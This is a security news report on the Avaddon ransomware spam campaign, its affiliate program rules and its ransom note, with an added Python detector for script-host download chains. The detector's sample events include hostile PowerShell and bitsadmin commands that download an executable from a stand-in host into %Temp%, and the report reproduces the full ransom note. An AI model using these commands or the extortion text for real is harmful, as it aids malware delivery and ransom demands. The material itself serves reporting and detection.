With a wink and a smile, the new Avaddon Ransomware has come alive in a massive spam campaign targeting users worldwide.
Avaddon was launched at the beginning of this month and is actively recruiting hackers and malware distributors to spread the ransomware by any means possible.
As its first known attack, the Avaddon Ransomware is being distributed in a spam campaign reminiscent of February's Nemty Ransomware Love Letter campaign.
In a related report shared with BleepingComputer, the cybersecurity firm AppRiver stated that the Phorphiex/Trik Botnet is distributing the malicious emails.
This campaign is not small, as AppRiver security researcher David Picket told us that they had blocked over 300,000 emails in just a short period.
To the recipient, the attachment would therefore just appear as a .jpg file, as shown below.
When executed, the JS attachment will launch both a PowerShell and Bitsadmin command to download the Avaddon ransomware executable to the %Temp% folder and run it.
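As an added example (not code from the article or from AppRiver), the following Python snippet flags the delivery chain described above in constructed Sysmon-style process-creation events: a script host (wscript.exe/cscript.exe) spawning PowerShell or Bitsadmin with a download primitive on the command line and a drop path under %Temp%. The event fields, file paths and the example.invalid URL are assumptions for the demonstration.

```python
import re

# Constructed Sysmon Event ID 1-style records (not real logs from the article).
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -w hidden (New-Object Net.WebClient).DownloadFile("
                    r"'http://example.invalid/a.exe','C:\Users\bob\AppData\Local\Temp\a.exe')"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high "
                    r"http://example.invalid/a.exe C:\Users\bob\AppData\Local\Temp\a.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign: admin-launched script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",  # script host, but no download/drop
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\cleanup.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"powershell.exe", "bitsadmin.exe"}
# Common download primitives for both tools, plus a bare URL on the command line.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|/transfer|/download|https?://", re.I)
# Drop location used by the campaign: the user's %Temp% folder.
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\|%temp%", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons an event matches the script-host download chain."""
    reasons = []
    if basename(event["ParentImage"]) in SCRIPT_HOSTS and basename(event["Image"]) in DOWNLOADERS:
        reasons.append("script host spawned " + basename(event["Image"]))
        cmd = event["CommandLine"]
        if DOWNLOAD_RE.search(cmd):
            reasons.append("download primitive in command line")
        if TEMP_RE.search(cmd):
            reasons.append("writes to %Temp%")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Indices and reasons of events with at least min_reasons indicators."""
    return [(i, classify(e)) for i, e in enumerate(events) if len(classify(e)) >= min_reasons]
```

A script host spawning PowerShell alone (the fourth event) is left below the threshold so that legitimate logon scripts do not page an analyst; the threshold is a tunable, not a verdict.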
In the sample tested by BleepingComputer, once executed, the ransomware will search for data to encrypt and append the .avdn extension to encrypted files.
In each folder, a ransom note named [id]-readme.html will also be created. This ransom note contains a link to the TOR payment site and a unique victim ID used to login to the site.
This TOR payment site includes the ransom amount, which in our case was $900, and instructions on how to pay for a decryptor.
Other sections of the TOR site include a support chat, free test decryption, and a help page illustrated by Harry Potter characters.
Unfortunately, ID-Ransomware creator Michael Gillespie has analyzed the ransomware and stated that it is secure and cannot be decrypted for free.
In advertisements posted to Russian-speaking hacker forums at the beginning of the month, Avaddon has stated that they are a new Ransomware-as-a-Service (RaaS) program.
In a RaaS program, the ransomware creator is responsible for the development of the malware and the operation of the TOR payment site.
Affiliates who join the program are responsible for distributing the ransomware via spam, network compromise, and exploit kits.
As part of this arrangement, Avaddon is paying affiliates 65% of any ransom payments they bring in, and the Avaddon operators will receive 35%. Larger affiliates are commonly able to negotiate a higher revenue share depending on the size of their attacks.
As is typical with RaaS programs, Avaddon has a series of rules that affiliates must follow when distributing the ransomware. The most common rule is that they cannot target victims in the Commonwealth of Independent States (CIS).
It is forbidden to work in the CIS countries (AZ, AM, BY, KZ, KG, MD, RU, TJ, UZ, UA, GE, TM)
It is forbidden to indicate or pass on to third parties the address of the admin panel on the .onion network.
It is forbidden to upload .exe to unverified scanners that merge AV labs.
Now that the Avaddon creators have started accepting applications, we should expect to see distribution increase and more advanced attacks to occur.
Your network has been infected by Avaddon
All your documents, photos, databases and other important files have been encrypted and you are not able to decrypt them by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software - Avaddon General Decryptor. Only we can give you this software and only we can restore your files! You can get more information on our page, which is located in a Tor hidden network.
How to get to our page
Download Tor browser - https://www.torproject.org/
Install Tor browser
Open link in Tor browser - avaddonbotrxmuyl.onion
Follow the instructions on this page
Your ID: XXX
DO NOT TRY TO RECOVER FILES YOURSELF! DO NOT MODIFY ENCRYPTED FILES! OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER!